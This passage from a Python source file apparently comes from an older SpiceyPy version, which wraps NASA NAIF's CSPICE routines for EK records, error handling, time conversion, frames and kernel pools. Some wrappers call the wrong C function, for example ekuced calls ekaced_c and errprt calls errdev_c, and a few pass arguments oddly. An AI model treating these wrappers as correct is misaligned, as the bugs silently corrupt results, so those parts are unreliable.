lenout = ctypes.c_int(lenout)
nvals = ctypes.c_int()
cvals = stypes.emptyCharArray(yLen=nelts, xLen=lenout)
isnull = ctypes.c_int()
libspice.ekrcec_c(handle, segno, recno, column, lenout, ctypes.byref(nvals), ctypes.byref(cvals), ctypes.byref(isnull))
assert failed() or (nvals.value <= nelts)
return nvals.value, stypes.cVectorToPython(cvals)[:nvals.value], bool(isnull.value)
@spiceErrorCheck
def ekrced(handle, segno, recno, column, nelts=_SPICE_EK_EKRCEX_ROOM_DEFAULT):
"""
Read data from a double precision column in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekrced_c.html
:param handle: Handle attached to EK file.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record from which data is to be read.
:type recno: int
:param column: Column name.
:type column: str
:return:
Number of values in column entry,
Float values in column entry,
Flag indicating whether column entry is null.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
nvals = ctypes.c_int(0)
dvals = stypes.emptyDoubleVector(nelts)
isnull = ctypes.c_int()
libspice.ekrced_c(handle, segno, recno, column, ctypes.byref(nvals), dvals,
ctypes.byref(isnull))
assert failed() or (nvals.value <= nelts)
return nvals.value, stypes.cVectorToPython(dvals)[:nvals.value], bool(isnull.value)
@spiceErrorCheck
def ekrcei(handle, segno, recno, column, nelts=_SPICE_EK_EKRCEX_ROOM_DEFAULT):
"""
Read data from an integer column in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekrcei_c.html
:param handle: Handle attached to EK file.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record from which data is to be read.
:type recno: int
:param column: Column name.
:type column: str
:return:
Number of values in column entry,
Integer values in column entry,
Flag indicating whether column entry is null.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
nvals = ctypes.c_int()
ivals = stypes.emptyIntVector(nelts)
isnull = ctypes.c_int()
libspice.ekrcei_c(handle, segno, recno, column, ctypes.byref(nvals), ivals,
ctypes.byref(isnull))
assert failed() or (nvals.value <= nelts)
return nvals.value, stypes.cVectorToPython(ivals)[:nvals.value], bool(isnull.value)
@spiceErrorCheck
def ekssum(handle, segno):
"""
Return summary information for a specified segment in a specified EK.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekssum_c.html
:param handle: Handle of EK.
:type handle: int
:param segno: Number of segment to be summarized.
:type segno: int
:return: EK segment summary.
:rtype: spicepy.utils.support_types.SpiceEKSegSum
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
segsum = stypes.SpiceEKSegSum()
libspice.ekssum_c(handle, segno, ctypes.byref(segsum))
return segsum
@spiceErrorCheck
def ektnam(n, lenout=_default_len_out):
"""
Return the name of a specified, loaded table.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ektnam_c.html
:param n: Index of table.
:type n: int
:param lenout: Maximum table name length.
:type lenout: int
:return: Name of table.
:rtype: str
"""
n = ctypes.c_int(n)
lenout = ctypes.c_int(lenout)
table = stypes.stringToCharP(lenout)
libspice.ektnam_c(n, lenout, table)
return stypes.toPythonString(table)
@spiceErrorCheck
def ekucec(handle, segno, recno, column, nvals, cvals, isnull):
"""
Update a character column entry in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekucec_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record to which data is to be updated.
:type recno: int
:param column: Column name.
:type column: str
:param nvals: Number of values in new column entry.
:type nvals: int
:param cvals: Character values comprising new column entry.
:type cvals: list of str.
:param isnull: Flag indicating whether column entry is null.
:type isnull: bool
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
nvals = ctypes.c_int(nvals)
vallen = ctypes.c_int(len(max(cvals, key=len)) + 1)
cvals = stypes.listToCharArrayPtr(cvals, xLen=vallen)
isnull = ctypes.c_int(isnull)
libspice.ekucec_c(handle, segno, recno, column, nvals, vallen, cvals, isnull)
@spiceErrorCheck
def ekuced(handle, segno, recno, column, nvals, dvals, isnull):
"""
Update a double precision column entry in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekuced_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record to which data is to be updated.
:type recno: int
:param column: Column name.
:type column: str
:param nvals: Number of values in new column entry.
:type nvals: int
:param dvals: Double precision values comprising new column entry.
:type dvals: Array of floats
:param isnull: Flag indicating whether column entry is null.
:type isnull: bool
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
nvals = ctypes.c_int(nvals)
dvals = stypes.toDoubleVector(dvals)
isnull = ctypes.c_int(isnull)
libspice.ekaced_c(handle, segno, recno, column, nvals, dvals, isnull)
@spiceErrorCheck
def ekucei(handle, segno, recno, column, nvals, ivals, isnull):
"""
Update an integer column entry in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekucei_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record to which data is to be updated.
:type recno: int
:param column: Column name.
:type column: str
:param nvals: Number of values in new column entry.
:type nvals: int
:param ivals: Integer values comprising new column entry.
:type ivals: Array of ints
:param isnull: Flag indicating whether column entry is null.
:type isnull: bool
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
nvals = ctypes.c_int(nvals)
ivals = stypes.toIntVector(ivals)
isnull = ctypes.c_int(isnull)
libspice.ekucei_c(handle, segno, recno, column, nvals, ivals, isnull)
@spiceErrorCheck
def ekuef(handle):
"""
Unload an EK file, making its contents inaccessible to the
EK reader routines, and clearing space in order to allow other
EK files to be loaded.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekuef_c.html
:param handle: Handle of EK file.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.ekuef_c(handle)
@spiceErrorCheck
def el2cgv(ellipse):
"""
Convert an ellipse to a center vector and two generating
vectors. The selected generating vectors are semi-axes of the
ellipse.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/el2cgv_c.html
:param ellipse: An Ellipse
:type ellipse: spiceypy.utils.support_types.Ellipse
:return: Center and semi-axes of ellipse.
:rtype: tuple
"""
assert (isinstance(ellipse, stypes.Ellipse))
center = stypes.emptyDoubleVector(3)
smajor = stypes.emptyDoubleVector(3)
sminor = stypes.emptyDoubleVector(3)
libspice.el2cgv_c(ctypes.byref(ellipse), center, smajor, sminor)
return stypes.cVectorToPython(center), stypes.cVectorToPython(
smajor), stypes.cVectorToPython(sminor)
@spiceErrorCheck
def elemc(item, inset):
"""
Determine whether an item is an element of a character set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/elemc_c.html
:param item: Item to be tested.
:type item: str
:param inset: Set to be tested.
:type inset: spiceypy.utils.support_types.SpiceCell
:return: True if item is an element of set.
:rtype: bool
"""
assert isinstance(inset, stypes.SpiceCell)
item = stypes.stringToCharP(item)
return bool(libspice.elemc_c(item, ctypes.byref(inset)))
@spiceErrorCheck
def elemd(item, inset):
"""
Determine whether an item is an element of a double precision set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/elemd_c.html
:param item: Item to be tested.
:type item: float
:param inset: Set to be tested.
:type inset: spiceypy.utils.support_types.SpiceCell
:return: True if item is an element of set.
:rtype: bool
"""
assert isinstance(inset, stypes.SpiceCell)
assert inset.dtype == 1
item = ctypes.c_double(item)
return bool(libspice.elemd_c(item, ctypes.byref(inset)))
@spiceErrorCheck
def elemi(item, inset):
"""
Determine whether an item is an element of an integer set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/elemi_c.html
:param item: Item to be tested.
:type item: int
:param inset: Set to be tested.
:type inset: spiceypy.utils.support_types.SpiceCell
:return: True if item is an element of set.
:rtype: bool
"""
assert isinstance(inset, stypes.SpiceCell)
assert inset.dtype == 2
item = ctypes.c_int(item)
return bool(libspice.elemi_c(item, ctypes.byref(inset)))
@spiceErrorCheck
def eqncpv(et, epoch, eqel, rapol, decpol):
"""
Compute the state (position and velocity of an object whose
trajectory is described via equinoctial elements relative to some
fixed plane (usually the equatorial plane of some planet).
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eqncpv_c.html
:param et: Epoch in seconds past J2000 to find state.
:type et: float
:param epoch: Epoch of elements in seconds past J2000.
:type epoch: float
:param eqel: Array of equinoctial elements
:type eqel: 9-Element Array of floats
:param rapol: Right Ascension of the pole of the reference plane.
:type rapol: float
:param decpol: Declination of the pole of the reference plane.
:type decpol: float
:return: State of the object described by eqel.
:rtype: 6-Element Array of floats
"""
et = ctypes.c_double(et)
epoch = ctypes.c_double(epoch)
eqel = stypes.toDoubleVector(eqel)
rapol = ctypes.c_double(rapol)
decpol = ctypes.c_double(decpol)
state = stypes.emptyDoubleVector(6)
libspice.eqncpv_c(et, epoch, eqel, rapol, decpol, state)
return stypes.cVectorToPython(state)
@spiceErrorCheck
def eqstr(a, b):
"""
Determine whether two strings are equivalent.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eqstr_c.html
:param a: Arbitrary character string.
:type a: str
:param b: Arbitrary character string.
:type b: str
:return: True if A and B are equivalent.
:rtype: bool
"""
return bool(libspice.eqstr_c(stypes.stringToCharP(a), stypes.stringToCharP(b)))
def erract(op, lenout, action=None):
"""
Retrieve or set the default error action.
spiceypy sets the default error action to "report" on init.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/erract_c.html
:param op: peration, "GET" or "SET".
:type op: str
:param lenout: Length of list for output.
:type lenout: int
:param action: Error response action.
:type action: str
:return: Error response action.
:rtype: str
"""
if action is None:
action = ""
lenout = ctypes.c_int(lenout)
op = stypes.stringToCharP(op)
action = ctypes.create_string_buffer(str.encode(action), lenout.value)
actionptr = ctypes.c_char_p(ctypes.addressof(action))
libspice.erract_c(op, lenout, actionptr)
return stypes.toPythonString(actionptr)
def errch(marker, string):
"""
Substitute a character string for the first occurrence of
a marker in the current long error message.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errch_c.html
:param marker: A substring of the error message to be replaced.
:type marker: str
:param string: The character string to substitute for marker.
:type string: str
"""
marker = stypes.stringToCharP(marker)
string = stypes.stringToCharP(string)
libspice.errch_c(marker, string)
def errdev(op, lenout, device):
"""
Retrieve or set the name of the current output device for error messages.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errdev_c.html
:param op: The operation, "GET" or "SET".
:type op: str
:param lenout: Length of device for output.
:type lenout: int
:param device: The device name.
:type device: str
:return: The device name.
:rtype: str
"""
lenout = ctypes.c_int(lenout)
op = stypes.stringToCharP(op)
device = ctypes.create_string_buffer(str.encode(device), lenout.value)
deviceptr = ctypes.c_char_p(ctypes.addressof(device))
libspice.errdev_c(op, lenout, deviceptr)
return stypes.toPythonString(deviceptr)
def errdp(marker, number):
"""
Substitute a double precision number for the first occurrence of
a marker found in the current long error message.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errdp_c.html
:param marker: A substring of the error message to be replaced.
:type marker: str
:param number: The d.p. number to substitute for marker.
:type number: float
"""
marker = stypes.stringToCharP(marker)
number = ctypes.c_double(number)
libspice.errdp_c(marker, number)
def errint(marker, number):
"""
Substitute an integer for the first occurrence of a marker found
in the current long error message.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errint_c.html
:param marker: A substring of the error message to be replaced.
:type marker: str
:param number: The integer to substitute for marker.
:type number: int
"""
marker = stypes.stringToCharP(marker)
number = ctypes.c_int(number)
libspice.errint_c(marker, number)
def errprt(op, lenout, inlist):
"""
Retrieve or set the list of error message items to be output when an
error is detected.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errprt_c.html
:param op: The operation, "GET" or "SET".
:type op: str
:param lenout: Length of list for output.
:type lenout: int
:param inlist: Specification of error messages to be output.
:type inlist: list of str.
:return: A list of error message items.
:rtype: list of str.
"""
lenout = ctypes.c_int(lenout)
op = stypes.stringToCharP(op)
inlist = ctypes.create_string_buffer(str.encode(inlist), lenout.value)
inlistptr = ctypes.c_char_p(ctypes.addressof(inlist))
libspice.errdev_c(op, lenout, inlistptr)
return stypes.toPythonString(inlistptr)
def esrchc(value, array):
"""
Search for a given value within a character string array.
Return the index of the first equivalent array entry, or -1
if no equivalent element is found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/esrchc_c.html
:param value: Key value to be found in array.
:type value: str
:param array: Character string array to search.
:type array: list of str.
:return:
The index of the first array entry equivalent to value,
or -1 if none is found.
:rtype: int
"""
value = stypes.stringToCharP(value)
ndim = ctypes.c_int(len(array))
lenvals = ctypes.c_int(len(max(array, key=len)) + 1)
array = stypes.listToCharArray(array, xLen=lenvals, yLen=ndim)
return libspice.esrchc_c(value, ndim, lenvals, array)
@spiceErrorCheck
def et2lst(et, body, lon, typein, timlen=_default_len_out, ampmlen=_default_len_out):
"""
Given an ephemeris epoch, compute the local solar time for
an object on the surface of a body at a specified longitude.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/et2lst_c.html
:param et: Epoch in seconds past J2000 epoch.
:type et: float
:param body: ID-code of the body of interest.
:type body: int
:param lon: Longitude of surface point (RADIANS).
:type lon: float
:param typein: Type of longitude "PLANETOCENTRIC", etc.
:type typein: str
:param timlen: Available room in output time string.
:type timlen: int
:param ampmlen: Available room in output ampm string.
:type ampmlen: int
:return:
Local hour on a "24 hour" clock,
Minutes past the hour,
Seconds past the minute,
String giving local time on 24 hour clock,
String giving time on A.M. / P.M. scale.
:rtype: tuple
"""
et = ctypes.c_double(et)
body = ctypes.c_int(body)
lon = ctypes.c_double(lon)
typein = stypes.stringToCharP(typein)
timlen = ctypes.c_int(timlen)
ampmlen = ctypes.c_int(ampmlen)
hr = ctypes.c_int()
mn = ctypes.c_int()
sc = ctypes.c_int()
time = stypes.stringToCharP(timlen)
ampm = stypes.stringToCharP(ampmlen)
libspice.et2lst_c(et, body, lon, typein, timlen, ampmlen,
ctypes.byref(hr), ctypes.byref(mn), ctypes.byref(sc),
time, ampm)
return hr.value, mn.value, sc.value, stypes.toPythonString(
time), stypes.toPythonString(ampm)
@spiceErrorCheck
def et2utc(et, formatStr, prec, lenout=_default_len_out):
"""
Convert an input time from ephemeris seconds past J2000
to Calendar, Day-of-Year, or Julian Date format, UTC.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/et2utc_c.html
:param et: Input epoch, given in ephemeris seconds past J2000.
:type et: float
:param formatStr: Format of output epoch.
:type formatStr: str
:param prec: Digits of precision in fractional seconds or days.
:type prec: int
:param lenout: The length of the output string plus 1.
:type lenout: int
:return: Output time string in UTC
:rtype: str
"""
et = ctypes.c_double(et)
prec = ctypes.c_int(prec)
lenout = ctypes.c_int(lenout)
formatStr = stypes.stringToCharP(formatStr)
utcstr = stypes.stringToCharP(lenout)
libspice.et2utc_c(et, formatStr, prec, lenout, utcstr)
return stypes.toPythonString(utcstr)
@spiceErrorCheck
def etcal(et, lenout=_default_len_out):
"""
Convert from an ephemeris epoch measured in seconds past
the epoch of J2000 to a calendar string format using a
formal calendar free of leapseconds.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/etcal_c.html
:param et: Ephemeris time measured in seconds past J2000.
:type et: Union[float,Iterable[float]]
:param lenout: Length of output string.
:type lenout: int
:return: A standard calendar representation of et.
:rtype: str
"""
lenout = ctypes.c_int(lenout)
string = stypes.stringToCharP(lenout)
if hasattr(et, "__iter__"):
strings = []
for t in et:
libspice.etcal_c(t, lenout, string)
checkForSpiceError(None)
strings.append(stypes.toPythonString(string))
return strings
else:
et = ctypes.c_double(et)
libspice.etcal_c(et, lenout, string)
return stypes.toPythonString(string)
@spiceErrorCheck
def eul2m(angle3, angle2, angle1, axis3, axis2, axis1):
"""
Construct a rotation matrix from a set of Euler angles.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eul2m_c.html
:param angle3: Rotation angle about third rotation axis (radians).
:type angle3: float
:param angle2: Rotation angle about second rotation axis (radians).
:type angle2: float
:param angle1: Rotation angle about first rotation axis (radians).
:type angle1: float
:param axis3: Axis number of third rotation axis.
:type axis3: int
:param axis2: Axis number of second rotation axis.
:type axis2: int
:param axis1: Axis number of first rotation axis.]
:type axis1: int
:return: Product of the 3 rotations.
:rtype: 3x3-Element Array of floats
"""
angle3 = ctypes.c_double(angle3)
angle2 = ctypes.c_double(angle2)
angle1 = ctypes.c_double(angle1)
axis3 = ctypes.c_int(axis3)
axis2 = ctypes.c_int(axis2)
axis1 = ctypes.c_int(axis1)
r = stypes.emptyDoubleMatrix()
libspice.eul2m_c(angle3, angle2, angle1, axis3, axis2, axis1, r)
return stypes.cMatrixToNumpy(r)
@spiceErrorCheck
def eul2xf(eulang, axisa, axisb, axisc):
"""
This routine computes a state transformation from an Euler angle
factorization of a rotation and the derivatives of those Euler
angles.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eul2xf_c.html
:param eulang: An array of Euler angles and their derivatives.
:type eulang: 6-Element Array of floats
:param axisa: Axis A of the Euler angle factorization.
:type axisa: int
:param axisb: Axis B of the Euler angle factorization.
:type axisb: int
:param axisc: Axis C of the Euler angle factorization.
:type axisc: int
:return: A state transformation matrix.
:rtype: 6x6-Element Array of floats
"""
assert len(eulang) is 6
eulang = stypes.toDoubleVector(eulang)
axisa = ctypes.c_int(axisa)
axisb = ctypes.c_int(axisb)
axisc = ctypes.c_int(axisc)
xform = stypes.emptyDoubleMatrix(x=6, y=6)
libspice.eul2xf_c(eulang, axisa, axisb, axisc, xform)
return stypes.cMatrixToNumpy(xform)
@spiceErrorCheck
def exists(fname):
"""
Determine whether a file exists.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/exists_c.html
:param fname: Name of the file in question.
:return: True if the file exists, False otherwise.
:rtype: bool
"""
fname = stypes.stringToCharP(fname)
return bool(libspice.exists_c(fname))
@spiceErrorCheck
def expool(name):
"""
Confirm the existence of a kernel variable in the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/expool_c.html
:param name: Name of the variable whose value is to be returned.
:type name: str
:return: True when the variable is in the pool.
:rtype: bool
"""
name = stypes.stringToCharP(name)
found = ctypes.c_int()
libspice.expool_c(name, ctypes.byref(found))
return bool(found.value)
################################################################################
# F
def failed():
"""
True if an error condition has been signalled via sigerr_c.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/failed_c.html
:return: a boolean
:rtype: bool
"""
return bool(libspice.failed_c())
@spiceErrorCheck
def fn2lun(fname):
"""
Internal undocumented command for mapping name of open file to
its FORTRAN (F2C) logical unit.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/FORTRAN/spicelib/fn2lun.html
:param fname: name of the file to be mapped to its logical unit.
:type fname: str
:return: the FORTRAN (F2C) logical unit associated with the filename.
:rtype: int
"""
fnameP = stypes.stringToCharP(fname)
unit_out = ctypes.c_int()
fname_len = ctypes.c_int(len(fname)+1)
libspice.fn2lun_(fnameP,ctypes.byref(unit_out),fname_len)
return unit_out.value
@spiceErrorCheck
def fovray(inst, raydir, rframe, abcorr, observer, et):
"""
Determine if a specified ray is within the field-of-view (FOV) of a
specified instrument at a given time.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/fovray_c.html
:param inst: Name or ID code string of the instrument.
:type inst: str
:param raydir: Ray's direction vector.
:type raydir: 3-Element Array of floats
:param rframe: Body-fixed, body-centered frame for target body.
:type rframe: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param observer: Name or ID code string of the observer.
:type observer: str
:param et: Time of the observation (seconds past J2000).
:type et: float
:return: Visibility flag
:rtype: bool
"""
inst = stypes.stringToCharP(inst)
raydir = stypes.toDoubleVector(raydir)
rframe = stypes.stringToCharP(rframe)
abcorr = stypes.stringToCharP(abcorr)
observer = stypes.stringToCharP(observer)
et = ctypes.c_double(et)
visible = ctypes.c_int()
libspice.fovray_c(inst, raydir, rframe, abcorr, observer, ctypes.byref(et),
ctypes.byref(visible))
return bool(visible.value)
@spiceErrorCheck
def fovtrg(inst, target, tshape, tframe, abcorr, observer, et):
"""
Determine if a specified ephemeris object is within the field-of-view (FOV)
of a specified instrument at a given time.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/fovtrg_c.html
:param inst: Name or ID code string of the instrument.
:type inst: str
:param target: Name or ID code string of the target.
:type target: str
:param tshape: Type of shape model used for the target.
:type tshape: str
:param tframe: Body-fixed, body-centered frame for target body.
:type tframe: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param observer: Name or ID code string of the observer.
:type observer: str
:param et: Time of the observation (seconds past J2000).
:type et: float
:return: Visibility flag
:rtype: bool
"""
inst = stypes.stringToCharP(inst)
target = stypes.stringToCharP(target)
tshape = stypes.stringToCharP(tshape)
tframe = stypes.stringToCharP(tframe)
abcorr = stypes.stringToCharP(abcorr)
observer = stypes.stringToCharP(observer)
et = ctypes.c_double(et)
visible = ctypes.c_int()
libspice.fovtrg_c(inst, target, tshape, tframe, abcorr, observer,
ctypes.byref(et), ctypes.byref(visible))
return bool(visible.value)
@spiceErrorCheck
def frame(x):
"""
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/frame_c.html
:param x: Input vector. A parallel unit vector on output.
:type x: 3-Element Array of floats
:return: a tuple of 3 list[3]
:rtype: tuple
"""
x = stypes.toDoubleVector(x)
y = stypes.emptyDoubleVector(3)
z = stypes.emptyDoubleVector(3)
libspice.frame_c(x, y, z)
return stypes.cVectorToPython(x), stypes.cVectorToPython(y), stypes.cVectorToPython(
z)
@spiceErrorCheck
@spiceFoundExceptionThrower
def frinfo(frcode):
"""
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/frinfo_c.html
:param frcode: the idcode for some frame.
:type frcode: int
:return: a tuple of attributes associated with the frame.
:rtype: tuple
"""
frcode = ctypes.c_int(frcode)
cent = ctypes.c_int()
frclss = ctypes.c_int()
clssid = ctypes.c_int()
found = ctypes.c_int()
libspice.frinfo_c(frcode, ctypes.byref(cent), ctypes.byref(frclss),
ctypes.byref(clssid), ctypes.byref(found))
return cent.value, frclss.value, clssid.value, bool(found.value)
@spiceErrorCheck
def frmnam(frcode, lenout=_default_len_out):
"""
Retrieve the name of a reference frame associated with a SPICE ID code.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/frmnam_c.html
:param frcode: an integer code for a reference frame
:type frcode: int
:param lenout: Maximum length of output string.
:type lenout: int
:return: the name associated with the reference frame.
:rtype: str
"""
frcode = ctypes.c_int(frcode)
lenout = ctypes.c_int(lenout)
frname = stypes.stringToCharP(lenout)
libspice.frmnam_c(frcode, lenout, frname)
return stypes.toPythonString(frname)
@spiceErrorCheck
def ftncls(unit):
"""
Close a file designated by a Fortran-style integer logical unit.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ftncls_c.html
:param unit: Fortran-style logical unit.
:type unit: int
"""
unit = ctypes.c_int(unit)
libspice.ftncls_c(unit)
@spiceErrorCheck
def furnsh(path):
"""
Load one or more SPICE kernels into a program.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/furnsh_c.html
:param path: one or more paths to kernels
:type path: str or list of str
"""
if isinstance(path, list):
for p in path:
libspice.furnsh_c(stypes.stringToCharP(p))
else:
path = stypes.stringToCharP(path)
libspice.furnsh_c(path)
################################################################################
# G
@spiceErrorCheck
@spiceFoundExceptionThrower
def gcpool(name, start, room, lenout=_default_len_out):
"""
Return the character value of a kernel variable from the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gcpool_c.html
:param name: Name of the variable whose value is to be returned.
:type name: str
:param start: Which component to start retrieving for name.
:type start: int
:param room: The largest number of values to return.
:type room: int
:param lenout: The length of the output string.
:type lenout: int
:return: Values associated with name.
:rtype: list of str
"""
name = stypes.stringToCharP(name)
start = ctypes.c_int(start)
room = ctypes.c_int(room)
lenout = ctypes.c_int(lenout)
n = ctypes.c_int()
cvals = stypes.emptyCharArray(lenout, room)
found = ctypes.c_int()
libspice.gcpool_c(name, start, room, lenout, ctypes.byref(n),
ctypes.byref(cvals), ctypes.byref(found))
return [stypes.toPythonString(x.value) for x in
cvals[0:n.value]], bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def gdpool(name, start, room):
"""
Return the d.p. value of a kernel variable from the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gdpool_c.html
:param name: Name of the variable whose value is to be returned.
:type name: str
:param start: Which component to start retrieving for name.
:type start: int
:param room: The largest number of values to return.
:type room: int
:return: Values associated with name.
:rtype: list of float
"""
name = stypes.stringToCharP(name)
start = ctypes.c_int(start)
values = stypes.emptyDoubleVector(room)
room = ctypes.c_int(room)
n = ctypes.c_int()
found = ctypes.c_int()
libspice.gdpool_c(name, start, room, ctypes.byref(n),
ctypes.cast(values, ctypes.POINTER(ctypes.c_double)),
ctypes.byref(found))
return stypes.cVectorToPython(values)[0:n.value], bool(found.value)
@spiceErrorCheck
def georec(lon, lat, alt, re, f):
"""
Convert geodetic coordinates to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/georec_c.html
:param lon: Geodetic longitude of point (radians).
:type lon: float
:param lat: Geodetic latitude of point (radians).
:type lat: float
:param alt: Altitude of point above the reference spheroid.
:type alt: float
:param re: Equatorial radius of the reference spheroid.
:type re: float
:param f: Flattening coefficient.
:type f: float
:return: Rectangular coordinates of point.
:rtype: 3-Element Array of floats
"""
lon = ctypes.c_double(lon)
lat = ctypes.c_double(lat)
alt = ctypes.c_double(alt)
re = ctypes.c_double(re)
f = ctypes.c_double(f)
rectan = stypes.emptyDoubleVector(3)
libspice.georec_c(lon, lat, alt, re, f, rectan)
return stypes.cVectorToPython(rectan)
# getcml not really needed
@spiceErrorCheck
def getelm(frstyr, lineln, lines):
"""
Given a the "lines" of a two-line element set, parse the
lines and return the elements in units suitable for use
in SPICE software.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/getelm_c.html
:param frstyr: Year of earliest representable two-line elements.
:type frstyr: int
:param lineln: Length of strings in lines array.
:type lineln: int
:param lines: A pair of "lines" containing two-line elements.
:type lines: list of str
:return:
The epoch of the elements in seconds past J2000,
The elements converted to SPICE units.
:rtype: tuple
"""
frstyr = ctypes.c_int(frstyr)
lineln = ctypes.c_int(lineln)
lines = stypes.listToCharArrayPtr(lines, xLen=lineln, yLen=2)
epoch = ctypes.c_double()
elems = stypes.emptyDoubleVector(10) # guess for length
libspice.getelm_c(frstyr, lineln, lines, ctypes.byref(epoch), elems)
return epoch.value, stypes.cVectorToPython(elems)
@spiceErrorCheck
def getfat(file):
"""
Determine the file architecture and file type of most SPICE kernel files.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/getfat_c.html
:param file: The name of a file to be examined.
:type file: str
:return: The architecture of the kernel file, The type of the kernel file.
:rtype: tuple
"""
file = stypes.stringToCharP(file)
arclen = ctypes.c_int(4)
typlen = ctypes.c_int(4)
arch = stypes.stringToCharP(arclen)
rettype = stypes.stringToCharP(typlen)
libspice.getfat_c(file, arclen, typlen, arch, rettype)
return stypes.toPythonString(arch), stypes.toPythonString(rettype)
@spiceErrorCheck
def getfov(instid, room, shapelen=_default_len_out, framelen=_default_len_out):
"""
This routine returns the field-of-view (FOV) parameters for a
specified instrument.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/getfov_c.html
:param instid: NAIF ID of an instrument.
:type instid: int
:param room: Maximum number of vectors that can be returned.
:type room: int
:param shapelen: Space available in the string shape.
:type shapelen: int
:param framelen: Space available in the string frame.
:type framelen: int
:return:
Instrument FOV shape,
Name of the frame in which FOV vectors are defined,
Boresight vector,
Number of boundary vectors returned,
FOV boundary vectors.
:rtype: tuple
"""
instid = ctypes.c_int(instid)
shape = stypes.stringToCharP(" " * shapelen)
framen = stypes.stringToCharP(" " * framelen)
shapelen = ctypes.c_int(shapelen)
framelen = ctypes.c_int(framelen)
bsight = stypes.emptyDoubleVector(3)
n = ctypes.c_int()
bounds = stypes.emptyDoubleMatrix(x=3, y=room)
room = ctypes.c_int(room)
libspice.getfov_c(instid, room, shapelen, framelen, shape, framen, bsight,
ctypes.byref(n), bounds)
return stypes.toPythonString(shape), stypes.toPythonString(
framen), stypes.cVectorToPython(
bsight), n.value, stypes.cMatrixToNumpy(bounds)[0:n.value]
def getmsg(option, lenout=_default_len_out):
"""
Retrieve the current short error message,
the explanation of the short error message, or the
long error message.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/getmsg_c.html
:param option: Indicates type of error message.
:type option: str
:param lenout: Available space in the output string msg.
:type lenout: int
:return: The error message to be retrieved.
:rtype: str
"""
option = stypes.stringToCharP(option)
lenout = ctypes.c_int(lenout)
msg = stypes.stringToCharP(lenout)
libspice.getmsg_c(option, lenout, msg)
return stypes.toPythonString(msg)
@spiceErrorCheck
def gfbail():
"""
Indicate whether an interrupt signal (SIGINT) has been received.
